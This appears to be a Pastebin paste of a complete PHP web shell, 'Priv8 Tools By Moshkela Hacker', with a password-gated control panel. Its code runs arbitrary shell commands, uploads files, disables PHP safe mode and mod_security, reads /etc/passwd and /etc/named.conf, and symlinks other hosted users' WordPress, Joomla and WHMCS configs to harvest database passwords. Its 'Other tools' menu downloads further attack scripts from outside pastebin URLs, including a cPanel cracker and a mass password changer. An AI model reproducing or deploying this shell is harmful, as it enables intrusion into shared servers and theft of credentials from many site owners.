API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 7th, 2019
128
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.32 KB | None | 0 0
raw download clone embed print report
  1. <?
  2.  
  3. $username = "admin"; # Here Your Username
  4. $password = "cd6e5f8cae72a13cb149fa907abeeb19"; # password = zaid
  5. $user = $_POST['user'];
  6. $pass = $_POST['pass'];
  7. $form = "<form method='POST'>
  8. <img src='https://khaberni-6zrocpuaymq7.stackpathdns.com/uploads/news_model/2018/08/main_image5b6ebdc662f06.JPG' style='position:fixed;width:100%;heigth:100%;top:0;left:0;z-index:-9999;' disabled>
  9. <center>
  10. <h1>3Bad Hacker</h1> <br>
  11. <br><input type='text' name='user'>
  12. <br>
  13. <input type='password' name='pass'>
  14. <br>
  15. <br><input type='submit' value='Login !'>
  16. </form></br>";
  17.  
  18. session_start();
  19. if(!isset($_SESSION['sec']))
  20. {
  21. $_SESSION['sec'] = false;
  22. }
  23. if(isset($pass))
  24. {
  25. if($user == $username and md5($pass) == $password)
  26. {
  27. $_SESSION['sec'] = true;
  28. }
  29. else
  30. {
  31. die("{$form} <br> Error :D");
  32. }
  33. }
  34. if(!$_SESSION['sec']):
  35. echo $form;
  36. exit();
  37. endif;
  38.  
  39. # Logout
  40. if($_GET['log'] == 'out')
  41. {
  42. session_destroy();
  43. }
  44. echo "Welcome {$user} | <a href='?log=out'>Logout</a>";
  45.  
  46. ?>
  47. <head>
  48.  
  49. <title>Priv8 Tools By Moshkela Hacker</title>
  50. <link rel="icon" href="http://icons.iconarchive.com/icons/custom-icon-design/round-world-flags/256/Jordan-icon.png">
  51. </head>
  52. <?
  53. set_time_limit(0);
  54. error_reporting(0);
  55. ?>
  56. <?php ?><html>
  57.  
  58.  
  59. <style type="text/css">
  60. html,body{
  61. background: #f9f9f9;
  62. padding: 0;
  63. direction: ltr;
  64. margin: 0;
  65. }
  66. h1{
  67. color:#ff0000;
  68. text-shadow:0 0 5px;
  69. }
  70. h3{
  71. color:#ff0000;
  72. text-shadow:0 0 1px;
  73. }
  74. .f{
  75. color:#666;
  76. text-shadow: 0 0 5px #00ff00;
  77. font-size: 20px;
  78. }
  79. a{
  80. text-decoration: none;
  81. color:#ff0000;
  82. text-shadow:0 0 5px;
  83. }
  84. input[type=submit]{
  85. padding: 9px;
  86. border:1px solid #ccc;
  87. background: #f9f9f9;
  88. border-radius: 2px;
  89. cursor: pointer;
  90. color:#000;
  91. transition: all 0.2s;
  92. }
  93. input[type=submit]:hover{
  94. box-shadow: 0 0 2px #ff0000;
  95. }
  96. input[type=text]{
  97. color:#000;
  98. border:1px solid #ccc;
  99. background: #f9f9f9;
  100. padding: 10px;
  101. width: 400px;
  102. transition: all 0.5s;
  103. }
  104. input[type=text]:focus{
  105. box-shadow: 0 0 3px #ff0000;
  106. }
  107. hr{
  108. border: 0;
  109. height: 2px;
  110. background: #333;
  111. background-image: linear-gradient(to right, #FF00FF, #333, #FF00FF);
  112. }}
  113. </style>
  114. <center>
  115. <hr>
  116. <form method='GET'>
  117.  
  118. <input type='submit'name='tool' value='Safe Mode' size='10' >
  119. <input type='submit'name='tool' value='Execute' size='10' >
  120. <input type='submit'name='tool' value='Config Killer' size='10' >
  121. <input type='submit'name='tool' value='Symlink' size='10' >
  122. <input type='submit'name='tool' value='Symlink 2' size='10' >
  123. <input type='submit'name='tool' value='Jumping' size='10' >
  124. <input type='submit'name='tool' value='Pass Config' size='10' >
  125. <input type='submit'name='tool' value='Upload' size='10' >
  126. <input type='submit'name='tool' value='Other tools' size='10' >
  127. <input type='submit'name='tool' value='Server Info' size='10' >
  128. <input type='submit'name='tool' value='About' size='10' >
  129.  
  130.  
  131.  
  132. </h5>
  133.  
  134. </form>
  135. <hr>
  136. <?php
  137. $x73 = "basename";
  138. $x74 = "chdir";
  139. $x75 = "copy";
  140. $x76 = "error_reporting";
  141. $x77 = "eregi";
  142. $x78 = "ereg";
  143. $x79 = "explode";
  144. $x7a = "fclose";
  145. $x7b = "file_get_contents";
  146. $x7c = "file_put_contents";
  147. $x7d = "file";
  148. $x7e = "flush";
  149. $x7f = "fileowner";
  150. $x80 = "fopen";
  151. $x81 = "fwrite";
  152. $x82 = "function_exists";
  153. $x83 = "getcwd";
  154. $x84 = "ini_restore";
  155. $x85 = "ini_get";
  156. $x86 = "is_file";
  157. $x87 = "mail";
  158. $x88 = "mkdir";
  159. $x89 = "mysql_connect";
  160. $x8a = "mysql_fetch_array";
  161. $x8b = "mysql_query";
  162. $x8c = "mysql_select_db";
  163. $x8d = "phpversion";
  164. $x8e = "posix_getpwuid";
  165. $x8f = "preg_match_all";
  166. $x90 = "preg_match";
  167. $x91 = "rand";
  168. $x92 = "set_time_limit";
  169. $x93 = "shell_exec";
  170. $x94 = "strlen";
  171. $x95 = "symlink";
  172. $x96 = "system";
  173. $x97 = "trim";
  174. $x92(0);
  175. $x76(0);
  176.  
  177. ///Safe Mode
  178. if ($_REQUEST['tool'] == "Safe Mode") {
  179. echo '<h3> Safe Mode Fucker </h3>
  180. <br><form method="POST" action="">
  181. <select name="way">
  182. <option>php.ini</option>
  183. <option>ini.php</option>
  184. <option>htaccess</option>
  185. </select><input name="bypass" type="submit"class="dh" value="Bypass Using"><br>';
  186. if ($_POST['way'] == "htaccess") {
  187. x0b();
  188. } elseif ($_POST['way'] == "php.ini") {
  189. x0c();
  190. } elseif ($_POST['way'] == "ini.php") {
  191. x0d();
  192. }
  193. }
  194. function x0b() {
  195. global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
  196. $x2f = $x80($x83() . $x30 . "/.htaccess", "w");
  197. $x81($x2f, "Options +FollowSymLinks
  198. DirectoryIndex india.htm
  199.  
  200. Options All Indexes
  201. <IfModule mod_security.c>
  202. SecFilterEngine Off
  203. SecFilterScanPOST Off
  204.  
  205. SecFilterCheckURLEncoding Off
  206. SecFilterCheckCookieFormat Off
  207. SecFilterCheckUnicodeEncoding Off
  208. SecFilterNormalizeCookies Off
  209. </IfModule>
  210. SetEnv PHPRC " . $x83() . $x30 . "/php.ini
  211. suPHP_ConfigPath " . $x83() . $x30 . "/php.ini");
  212. $x7a($x2f);
  213. if ($x86($x83() . $x30 . "/.htaccess")) {
  214. echo "<Span style='color:#FF00FF;'><strong>.htaccess Created successfully</strong></span><br>";
  215. } else {
  216. echo "<strong><Span style='color:#FF00FF;'>I can not create .htaccess</strong></span><br>";
  217. };
  218. }
  219. function x0c() {
  220. global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
  221. $x31 = $x80($x83() . $x30 . "/php.ini", "w");
  222. $x81($x31, "safe_mode = Off
  223. disable_functions = NONE
  224. safe_mode_gid = OFF
  225.  
  226. open_basedir = OFF");
  227. $x7a($x31);
  228. if ($x86($x83() . $x30 . "/php.ini")) {
  229. echo "<strong><Span style='color:#FF00FF;'>php.ini Created successfully</strong></span><br>";
  230. } else {
  231. echo "<strong><Span style='color:#FF00FF;'>I can not create php.ini</strong></span><br>";
  232. };
  233. }
  234. function x0d() {
  235. global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
  236. $x32 = $x80($x83() . $x30 . "/ini.php", "w");
  237. $x81($x32, '$x84("safe_mode");
  238. $x84("open_basedir");');
  239. $x7a($x32);
  240. if ($x86($x83() . $x30 . "/ini.php")) {
  241. echo "<strong><Span style='color:#FF00FF;'>ini.php Created successfully</strong></span><br>";
  242. } else {
  243. echo "<strong><Span style='color:red;'>I can not create ini.php</strong></span><br>";
  244. };
  245. }
  246. //////Execute
  247. if ($_REQUEST['tool'] == "Execute") {
  248. echo '<h3> Execute </h3>
  249. <form method="post">
  250. <input name="cmd" />
  251. <input type="submit"class="dh" name="go" />
  252. </form>';
  253. if ($_POST['go']) {
  254. $x4b = $x82("system");
  255. $x4c = $x82("passthru");
  256. $x4d = $x82("shell_exec");
  257. if ($x4b) {
  258. echo "<textarea readonly='' cols='90'rows='20'>";
  259. echo $x96($_POST['cmd']);
  260. echo '</textarea>';
  261. }
  262. if (!$x4b & $x4c) {
  263. echo "<textarea readonly='' cols='90'rows='20'>";
  264. echo passthrsu($_POST['cmd']);
  265. echo '</textarea>';
  266. }
  267. if (!$x4b & !$x4c & $x4d) {
  268. echo "<textarea readonly='' cols='90'rows='20'>";
  269. echo $x93($_POST['cmd']);
  270. echo '</textarea>';
  271. }
  272. }
  273. }
  274. /////upload
  275. else if ($_REQUEST['tool'] == "Upload") {
  276. echo"<h3>Upload</h3>";
  277. if(isset($_POST['Submit'])){
  278. $filedir = "";
  279. $maxfile = '2000000';
  280.  
  281. $userfile_name = $_FILES['image']['name'];
  282. $userfile_tmp = $_FILES['image']['tmp_name'];
  283. if (isset($_FILES['image']['name'])) {
  284. $abod = $filedir.$userfile_name;
  285. @move_uploaded_file($userfile_tmp, $abod);
  286.  
  287. echo"<center><b><h3> Don3 ==> $userfile_name</h3></b></center>";
  288. }
  289. }
  290. else{
  291. echo'
  292. <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit"class="dh" name="Submit" value="up"></form>';
  293. }
  294. }
  295. ////Config Killer
  296. else if ($_REQUEST['tool'] == "Config Killer") {
  297.  
  298. echo "<br><center><h3>Config Killer</h3>"; ?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#007700" size="2pt"></p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo $x7b('/etc/passwd'); ?></textarea><br><br><input name="config" size="100" value="GET Config" type="submit"class="dh"><br></form></center><br><?php
  299. }
  300. if ($_POST['config']) {
  301. $x33 = $x34 = @$x85("disable_functions");
  302. if ($x77("symlink", $x34)) {
  303. die('<error>Symlink is disabled :( </error>');
  304. }
  305. @$x88('M-Iraq', 0755);
  306. @$x74('M-Iraq');
  307. $x2f = "
  308.  
  309. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  310.  
  311. Options Indexes FollowSymLinks
  312. ForceType text/plain
  313. AddType text/plain .php
  314.  
  315. AddType text/plain .html
  316.  
  317. AddType text/html .shtml
  318. AddType txt .php
  319. AddHandler server-parsed .php
  320.  
  321. AddHandler txt .php
  322.  
  323. AddHandler txt .html
  324.  
  325. AddHandler txt .shtml
  326.  
  327. Options All
  328. Options All";
  329. $x7c(".htaccess", $x2f, FILE_APPEND);
  330. $x35 = $_POST["passwd"];
  331. $x35 = $x79("
  332. ", $x35);
  333.  
  334. foreach ($x35 as $x36) {
  335. $x37 = $x79(":", $x36);
  336. $x38 = $x37[0];
  337. @$x95('/home/' . $x38 . '/public_html/wp-config.php', $x38 . '-wp13.txt');
  338. @$x95('/home/' . $x38 . '/public_html/wp/wp-config.php', $x38 . '-wp13-wp.txt');
  339. @$x95('/home/' . $x38 . '/public_html/WP/wp-config.php', $x38 . '-wp13-WP.txt');
  340. @$x95('/home/' . $x38 . '/public_html/wp/beta/wp-config.php', $x38 . '-wp13-wp-beta.txt');
  341. @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp13-beta.txt');
  342. @$x95('/home/' . $x38 . '/public_html/press/wp-config.php', $x38 . '-wp13-press.txt');
  343. @$x95('/home/' . $x38 . '/public_html/wordpress/wp-config.php', $x38 . '-wp13-wordpress.txt');
  344. @$x95('/home/' . $x38 . '/public_html/Wordpress/wp-config.php', $x38 . '-wp13-Wordpress.txt');
  345. @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp13-Wordpress.txt');
  346. @$x95('/home/' . $x38 . '/public_html/config.php', $x38 . '-configgg.txt');
  347. @$x95('/home/' . $x38 . '/public_html/news/wp-config.php', $x38 . '-wp13-news.txt');
  348. @$x95('/home/' . $x38 . '/public_html/new/wp-config.php', $x38 . '-wp13-new.txt');
  349. @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp-blog.txt');
  350. @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp-beta.txt');
  351. @$x95('/home/' . $x38 . '/public_html/blogs/wp-config.php', $x38 . '-wp-blogs.txt');
  352. @$x95('/home/' . $x38 . '/public_html/home/wp-config.php', $x38 . '-wp-home.txt');
  353. @$x95('/home/' . $x38 . '/public_html/db.php', $x38 . '-dbconf.txt');
  354. @$x95('/home/' . $x38 . '/public_html/site/wp-config.php', $x38 . '-wp-site.txt');
  355. @$x95('/home/' . $x38 . '/public_html/main/wp-config.php', $x38 . '-wp-main.txt');
  356. @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-wp-test.txt');
  357. @$x95('/home/' . $x38 . '/public_html/joomla/configuration.php', $x38 . '-joomla2.txt');
  358. @$x95('/home/' . $x38 . '/public_html/portal/configuration.php', $x38 . '-joomla-protal.txt');
  359. @$x95('/home/' . $x38 . '/public_html/joo/configuration.php', $x38 . '-joo.txt');
  360. @$x95('/home/' . $x38 . '/public_html/cms/configuration.php', $x38 . '-joomla-cms.txt');
  361. @$x95('/home/' . $x38 . '/public_html/site/configuration.php', $x38 . '-joomla-site.txt');
  362. @$x95('/home/' . $x38 . '/public_html/main/configuration.php', $x38 . '-joomla-main.txt');
  363. @$x95('/home/' . $x38 . '/public_html/news/configuration.php', $x38 . '-joomla-news.txt');
  364. @$x95('/home/' . $x38 . '/public_html/new/configuration.php', $x38 . '-joomla-new.txt');
  365. @$x95('/home/' . $x38 . '/public_html/home/configuration.php', $x38 . '-joomla-home.txt');
  366. @$x95('/home/' . $x38 . '/public_html/vb/includes/config.php', $x38 . '-vb-config.txt');
  367. @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm15.txt');
  368. @$x95('/home/' . $x38 . '/public_html/central/configuration.php', $x38 . '-whm-central.txt');
  369. @$x95('/home/' . $x38 . '/public_html/whm/whmcs/configuration.php', $x38 . '-whm-whmcs.txt');
  370. @$x95('/home/' . $x38 . '/public_html/whm/WHMCS/configuration.php', $x38 . '-whm-WHMCS.txt');
  371. @$x95('/home/' . $x38 . '/public_html/whmc/WHM/configuration.php', $x38 . '-whmc-WHM.txt');
  372. @$x95('/home/' . $x38 . '/public_html/whmcs/configuration.php', $x38 . '-whmcs.txt');
  373. @$x95('/home/' . $x38 . '/public_html/support/configuration.php', $x38 . '-support.txt');
  374. @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-joomla.txt');
  375. @$x95('/home/' . $x38 . '/public_html/submitticket.php', $x38 . '-whmcs2.txt');
  376. @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm.txt');
  377. }
  378. echo '<b class="cone"><font face="Tahoma" color="#FF00FF" size="2pt"><b>[M-IRAQ] -></b> <a target="_blank" href="M-Iraq">Open configs</a></font></b>';
  379. }
  380. }
  381. ////Symlink
  382. else if ($_REQUEST['tool'] == "Symlink") {
  383. echo "<h3>Symlink Bypass </h3>";
  384. echo '<form action="" method="post">';
  385. @$x92(0);
  386. echo "<center>";
  387. @$x88('m-iraq', 0777);
  388. $x2f = "Options Indexes FollowSymLinks
  389. DirectoryIndex ssssss.htm
  390. AddType txt .php
  391. AddHandler txt .php
  392. AddType txt .html
  393. AddHandler txt .html
  394. Options all
  395. Options
  396. Options
  397. ReadmeName r.txt";
  398. $x26 = @$x80('m-iraq/.htaccess', 'w');
  399. $x81($x26, $x2f);
  400. @$x95('/', 'm-iraq/root');
  401. $x27 = $x73('index.php');
  402. $x28 = @$x7d('/etc/named.conf');
  403. if (!$x28) {
  404. echo "<pre ='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  405. } else {
  406. echo "<br><br><div><table border='1' bordercolor='#FF00FF' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  407. foreach ($x28 as $x29) {
  408. if ($x77('zone', $x29)) {
  409. $x8f('#zone "(.*)"#', $x29, $x2a);
  410. $x7e();
  411. if ($x94($x97($x2a[1][0])) > 2) {
  412. $x2b = $x8e(@$x7f('/etc/valiases/' . $x2a[1][0]));
  413. $x2c = $x2b['name'];
  414. @$x95('/', 'm-iraq/root');
  415. $x2c = $x2a[1][0];
  416. $x2d = '\.sa';
  417. $x2e = '\.il';
  418. $x1e = '\.id';
  419. $x1f = '\.sg';
  420. $x20 = '\.edu';
  421. $x21 = '\.gov';
  422. $x22 = '\.go';
  423. $x23 = '\.gob';
  424. $x24 = '\.mil';
  425. $x25 = '\.mi';
  426. if ($x77("$x2d", $x2a[1][0]) or $x77("$x2e", $x2a[1][0]) or $x77("$x1e", $x2a[1][0]) or $x77("$x1f", $x2a[1][0]) or $x77("$x20", $x2a[1][0]) or $x77("$x21", $x2a[1][0]) or $x77("$x22", $x2a[1][0]) or $x77("$x23", $x2a[1][0]) or $x77("$x24", $x2a[1][0]) or $x77("$x25", $x2a[1][0])) {
  427. $x2c = "<div style=' color: #FF00FF ; text-shadow: 0px 0px 1px red; '>" . $x2a[1][0] . '</div>';
  428. }
  429. echo "
  430. <tr>
  431. <td>
  432. <div class='dom'><a target='_blank' href=http://www." . $x2a[1][0] . '/>' . $x2c . ' </a> </div>
  433. </td>
  434. <td>
  435. ' . $x2b['name'] . "
  436. </td>
  437.  
  438. <td>
  439. <a href='m-iraq/root/home/" . $x2b['name'] . "/public_html' target='_blank'>Symlink </a>
  440. </td>
  441. </tr></div> ";
  442. }
  443. }
  444. }
  445. }
  446. echo "</table>";
  447. }
  448. //// Symlink2
  449. else if ($_REQUEST['tool'] == "Symlink 2") {
  450. echo '
  451. <h3>Symlink-2</h3>
  452. <FORM ACTION="#" METHOD="POST">
  453. <br>
  454. <br>
  455. <center> <font size="2" face="MV Boli" color=rgba(1, 44, 221, 0.9) ></font> <INPUT TYPE="text" NAME="user"placeholder="/home/user/public_html/config.php" SIZE=60><INPUT TYPE="submit"class="dh" VALUE="Sym"> </center>
  456. </FORM>';
  457. $x4e = $_POST["user"];
  458. $x4f = '' . $x91() . '.txt';
  459. if ($x4e) {
  460. $x50 = $x91();
  461. @$x88($x50);
  462. $x51 = $x50 . "/.htaccess";
  463. $x52 = $x80($x51, 'w') or die("Error: Can't open file");
  464. $x53 = 'Options +Indexes
  465. ReadMeName ' . $x4f;
  466. $x81($x52, $x53);
  467. $x7a($x52);
  468. $x74($x50);
  469. $x95($x4e, $x4f);
  470. $x74("../");
  471. echo "<center><iframe height ='500px' width='100%' src=" . $x50 . "></iframe></center>";
  472. }
  473. }
  474. /////Get Password in Config
  475. else if ($_REQUEST['tool'] == "Pass Config") {
  476. echo"<h3>Get Password in Config</h3>";
  477. echo '<form method="post">
  478. <input type="text" name="conf" value="" />
  479. <input type="submit"class="dh"value="GeT Passwords" name="get" />
  480. </form>';
  481. $x39 = $_POST['get'];
  482. $x3a = $_POST['conf'];
  483. //////////////////////////////////////////////////////////////////////////////////////////////
  484. if (isset($x39) && $x3a != "") {
  485. $x3b = @$x7b($x3a);
  486. //$x8f('#href="(.*?)">(.*?)<#',$x3b,$x3c); // $x3c[2]
  487. $x8f('#href="(.*?)"#', $x3b, $x3c);
  488. foreach ($x3c[1] as $x3d) {
  489. $x3e = $x3a . $x3d;
  490. $x3f = @$x7b($x3e);
  491. $x90('#\'DB_PASSWORD\', \'(.*)\'#', $x3f, $x40); // wordpress
  492. $x90('#password = \'(.*)\'#', $x3f, $x41); // joomla
  493. $x90('#password\'] = \'(.*)\'#', $x3f, $x42); // vb
  494. $x90('#db_password = "(.*)"#', $x3f, $x43); // whmcs
  495. $x90('#db_password = \'(.*)\'#', $x3f, $x43); // whmcs
  496. $x90('#dbpass = "(.*)"#', $x3f, $x44); //
  497. $x90('#password = \'(.*)\'#', $x3f, $x45); // connnect.php
  498. $x90('#dbpasswd = \'(.*)\'#', $x3f, $x46); // phpBB 3.0.x
  499. $x90('#password_localhost = "(.*)"#', $x3f, $x47); // conexao.php
  500. $x90('#senha = "(.*)"#', $x3f, $x48); // /_inc/config.inc.php
  501. if (!empty($x40[1])) {
  502. echo $x40[1] . "<br>";
  503. } elseif (!empty($x41[1])) {
  504. echo $x41[1] . "<br>";
  505. } elseif (!empty($x42[1])) {
  506. echo $x42[1] . "<br>";
  507. } elseif (!empty($x43[1])) {
  508. echo $x43[1] . "<br>";
  509. } elseif (!empty($x44[1])) {
  510. echo $x44[1] . "<br>";
  511. } elseif (!empty($x45[1])) {
  512. echo $x45[1] . "<br>";
  513. } elseif (!empty($x49[1])) {
  514. echo $x49[1] . "<br>";
  515. } elseif (!empty($x46[1])) {
  516. echo $x46[1] . "<br>";
  517. } elseif (!empty($x47[1])) {
  518. echo $x47[1] . "<br>";
  519. } elseif (!empty($x48[1])) {
  520. echo $x48[1] . "<br>";
  521. }
  522. }
  523. }
  524. }
  525. ////Jumping
  526. else if ($_REQUEST['tool'] == "Jumping") {
  527. echo"<h3>Jumping</h3>";
  528. $x26 = "array_push";
  529. $x27 = "feof";
  530. $x28 = "fgets";
  531. $x29 = "fopen";
  532. $x2a = "ini_get";
  533. $x2b = "is_readable";
  534. $x2c = "set_time_limit";
  535. $x2d = "strpos";
  536. $x2e = "substr";
  537. ($x2f = $x2a('safe_mode') == 0) ? $x2f = 'off' : die('<b>Error: Safe Mode is On</b>');
  538. $x2c(0);
  539. @$x30 = $x29('/etc/passwd', 'r');
  540. if (!$x30) {
  541. die('<b><font face=Verdana size=2 color=#FF00FF> Error : Can Not Read Config Of Server </b>');
  542. }
  543. $x31 = array();
  544. $x32 = array();
  545. $x33 = array();
  546. $x34 = 0;
  547. echo "<b><font face=Verdana size=13 color=#FF00FF> </font></b><br />";
  548. echo "<br />";
  549. while (!$x27($x30)) {
  550. $x35 = $x28($x30);
  551. if ($x34 > 35) {
  552. $x36 = $x2d($x35, ':');
  553. $x37 = $x2e($x35, 0, $x36);
  554. $x38 = '/home/' . $x37 . '/public_html/';
  555. if (($x37 != '')) {
  556. if ($x2b($x38)) {
  557. $x26($x32, $x37);
  558. $x26($x31, $x38);
  559. echo "<font face=Verdana size=2 color=#FF00FF> $x38</font>";
  560. echo "<br/>";
  561. }
  562. }
  563. }
  564. $x34++;
  565. }
  566. }
  567. /////About
  568. else if ($_REQUEST['tool'] == "About") {
  569. echo '
  570. <img src="http://d.top4top.net/p_37rzbl1.png" width="500" height="400" />
  571. <h1> Coded By Moshkela Hacker<br>
  572.  
  573. </h1>
  574. <h3>tnx : Mostafa Moshkela </h3>
  575.  
  576. ';
  577. }
  578. ////Server Info
  579. else if ($_REQUEST['tool'] == "Server Info") {
  580. echo"<h3>Server Info</h3>";
  581. $safe = ini_get("safe_mode");
  582. if($safe == 1){
  583. $safe_mode = "<font color=red>ON</font>";
  584. }else{
  585. $safe_mode = "<font color=#FF00FF>OFF</font>";
  586. }
  587. $dis = ini_get("disable_functions");
  588. if($dis == ""){
  589. $disable = "<font color=#FF00FF>None</font>";
  590. }else{
  591. $disable = "<font color=red>$dis</font>";
  592. }
  593. $uname = php_uname();
  594. $server = $_SERVER['SERVER_ADDR'];
  595. $me = $_SERVER['REMOTE_ADDR'];
  596. echo "
  597. <div>
  598. <span>
  599. Uname-a : $uname<br>
  600. Safe Mode : $safe_mode<br>
  601. Disable Functions : $disable
  602. </span>
  603. <span class=info2>
  604. <br>Server IP : $server </br>
  605. <br>Your IP : $me </br>
  606. </span>
  607. </div>
  608. ";
  609.  
  610. }else if($_REQUEST['tool'] == "Other tools"){
  611. echo"<h3>Other tools</h3>";
  612. echo'<form method="post">
  613. <b><span style=\"color: rgb(51, 204, 0);\"> Tools : <b></span><select name="tools" >
  614. <option>Moshkela Hacker Tools</option>
  615. <option>Find Shell</option>
  616. <option>Get Jomla Sites</option>
  617. <option>Get WordPress Sites</option>
  618. <option>Get All Sites Server</option>
  619. <option>1337w0rm</option>
  620. <option>Adminer</option>
  621. <option>Mass Password</option>
  622. </select>
  623. <input type="submit" name="get" value="Get" />
  624. </form>';
  625. /////////////////////////////////////////////////////////////////
  626. if($_POST['get']){
  627.  
  628. switch($_POST['tools']){
  629.  
  630. //////////////////////////////////////////////البحث عن الشلات
  631. case "Find Shell":
  632. if(file_put_contents('Findshell.php',file_get_contents('http://pastebin.com/raw/AR8MzfZV'))){
  633. echo "<center><font color=red size=8>Findshell.php Done !</font></center>";
  634. };
  635. break;
  636. ////////////////////////////////////////////// جلب المواقع المركبه سكربت جوملا
  637. case "Get Jomla Sites":
  638. if(file_put_contents('jomla.php',file_get_contents('http://pastebin.com/raw/9BQ62rZF'))){
  639. echo "<center><font color=red size=8>jomla.php Done !</font></center>";
  640. }
  641. break;
  642. ////////////////////////////////////////////// جلب المواقع المركبه سكربت وردبرس
  643. case "Get WordPress Sites":
  644. if(file_put_contents('wordpress.php',file_get_contents('http://pastebin.com/raw/504iswx3'))){
  645. echo "<center><font color=red size=8>wordpress.php Done !</font></center>";
  646. }
  647. break;
  648. ////////////////////////////////////////////// جلب جميع المواقع على السيرفر
  649. case "Get All Sites Server":
  650. if(file_put_contents('ip.php',file_get_contents('http://pastebin.com/raw/c70btt4r'))){
  651. echo "<center><font color=red size=8>ip.php Done !</font></center>";
  652. }
  653. break;
  654. ////////////////////////////////////////////// التخمين على السي بنل
  655. case "1337w0rm":
  656. if(file_put_contents('1337w0rm.php',file_get_contents('http://pastebin.com/raw/sqK6hVJd'))){
  657. echo "<center><font color=red size=8>1337w0rm.php Done !</font></center>";
  658. }
  659. break;
  660. //////////////////////////////////////////////الاتصال بقاعدة البيانات
  661. case "Adminer":
  662. if(file_put_contents('Adminer.php',file_get_contents('http://pastebin.com/raw/BZHXtZqu'))){
  663. echo "<center><font color=red size=8>Adminer.php Done !</font></center>";
  664. }
  665. break;
  666. //////////////////////////////////////////////تغير جميع مواقع السيرفر
  667. case "Mass Password":
  668. if(file_put_contents('Masspass.php',file_get_contents('http://pastebin.com/raw/eLv6MUpD'))){
  669. echo "<center><font color=red size=8>Masspass.php Done !</font></center>";
  670. }
  671. break;
  672. //////////////////////////////////////////////
  673. } // switch end
  674. }// end if
  675. }
  676. ?>
  677. <?php exit(); ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!